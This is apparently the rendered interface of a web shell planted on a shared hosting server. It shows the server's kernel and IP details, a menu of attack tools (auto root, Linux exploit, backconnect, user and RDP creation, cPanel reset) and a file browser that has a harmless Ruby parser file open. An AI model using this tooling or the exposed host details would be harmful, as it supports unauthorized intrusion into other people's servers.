Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
[ HOME SHELL ]
Name
Size
Permission
Action
parse_result
[ DIR ]
drwxr-xr-x
polyfill
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
compiler.rb
15.18
KB
-rw-r--r--
desugar_compiler.rb
9.87
KB
-rw-r--r--
dispatcher.rb
111.23
KB
-rw-r--r--
dsl.rb
56.4
KB
-rw-r--r--
ffi.rb
18.45
KB
-rw-r--r--
inspect_visitor.rb
124.43
KB
-rw-r--r--
lex_compat.rb
32.42
KB
-rw-r--r--
mutation_compiler.rb
21.08
KB
-rw-r--r--
node.rb
585.16
KB
-rw-r--r--
node_ext.rb
14.94
KB
-rw-r--r--
pack.rb
5.86
KB
-rw-r--r--
parse_result.rb
27.79
KB
-rw-r--r--
pattern.rb
8.14
KB
-rw-r--r--
reflection.rb
28.7
KB
-rw-r--r--
relocation.rb
15.1
KB
-rw-r--r--
serialize.rb
83.89
KB
-rw-r--r--
string_query.rb
755
B
-rw-r--r--
translation.rb
449
B
-rw-r--r--
visitor.rb
15.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : string_query.rb
# frozen_string_literal: true module Prism # Query methods that allow categorizing strings based on their context for # where they could be valid in a Ruby syntax tree. class StringQuery # The string that this query is wrapping. attr_reader :string # Initialize a new query with the given string. def initialize(string) @string = string end # Whether or not this string is a valid local variable name. def local? StringQuery.local?(string) end # Whether or not this string is a valid constant name. def constant? StringQuery.constant?(string) end # Whether or not this string is a valid method name. def method_name? StringQuery.method_name?(string) end end end
Close